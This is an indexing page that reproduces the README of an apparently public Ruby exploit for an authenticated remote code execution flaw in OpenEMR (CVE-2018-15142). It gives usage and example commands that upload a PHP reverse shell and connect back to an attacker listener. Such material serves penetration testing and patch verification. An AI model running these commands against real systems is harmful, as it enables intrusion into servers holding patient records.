Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/noraj/openemr-rce

OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution
https://github.com/noraj/openemr-rce

cve-2018-15142 exploit openemr openemr-exploit openemr-rce openemr-shell-upload openemr-vulnerability poc proof-of-concept rce remote-code-execution

Last synced: about 1 month ago
JSON representation

OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

Awesome Lists containing this project

README 

        
# OpenEMR RCE exploit / PoC



> OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution



Exploit for [CVE-2018-15142](https://nvd.nist.gov/vuln/detail/CVE-2018-15142).



[[EDB-49486](https://www.exploit-db.com/exploits/49486)] [[PacketStorm](https://packetstormsecurity.com/files/158711/OpenEMR-5.0.1-Remote-Code-Execution.html)] [[WLB-2020080011](https://cxsecurity.com/issue/WLB-2020080011)]



## Usage



```

$ ruby exploit.rb --help

OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution



Usage:

  exploit.rb manual --root-url  --shell  --user  --password  [--debug]

  exploit.rb semi-auto --root-url  --user  --password  --payload  --lhost  --lport  [--debug]

  exploit.rb auto --root-url  --user  --password  --lhost  --lport  [--debug]

  exploit.rb -H | --help



Options:

  -r , --root-url             Root URL (base path) including HTTP scheme, port and root folder

  -s , --shell      Filename of the PHP reverse shell payload

  -u , --user       Username of the admin

  -p , --password   Password of the admin

  -m , --payload      Metasploit PHP payload

  -h , --lhost              Reverse shell local host

  -t , --lport              Reverse shell local port

  --debug                               Display arguments

  -H, --help                            Show this screen



Examples:

  exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123

  exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888

  exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

```



## Modes



- **Auto**: you know the target and have your listener ready, let the exploit handle the rest

- **Semit-auto**: same as auto but you would like to specify another payload than the default `php/reverse_php`

- **Manual**: you already have a custom PHP reverse shell, the exploit lets you specify it



## Requirements



- [httpclient](https://github.com/nahi/httpclient)

- [docopt.rb](https://github.com/docopt/docopt.rb)

- (Optional) [Metasploit Framework](https://github.com/rapid7/metasploit-framework) (`msfvenom` for reverse shell generation in auto and semi-auto modes)



Example for BlackArch:



```

pacman -S ruby-httpclient ruby-docopt metasploit

```



Example using gem:



```

gem install httpclient docopt

```



## Reference



This is a better re-write of [EDB-ID-48515][EDB-ID-48515] and implementation of [EDB-ID-45202 part 2][EDB-ID-45202]:



- using arguments (instead of hardcoded values)

- allowing custom PHP reverse shell or auto generating one with `msfconsole`

- cleaner & more customizable

- using ruby (python2 is deprecated)



This exploit was tested with Ruby 2.7.1.



About [EDB-ID-48515][EDB-ID-48515]:



```

Exploit Author: Musyoka Ian

Date: 2020-05-25

Vendor Homepage: https://www.open-emr.org/

Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz

Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 

Version: < 5.0.1 (Patch 4)

Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3

References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69

```



[EDB-ID-48515]:https://www.exploit-db.com/exploits/48515

[EDB-ID-45202]:https://www.exploit-db.com/exploits/45202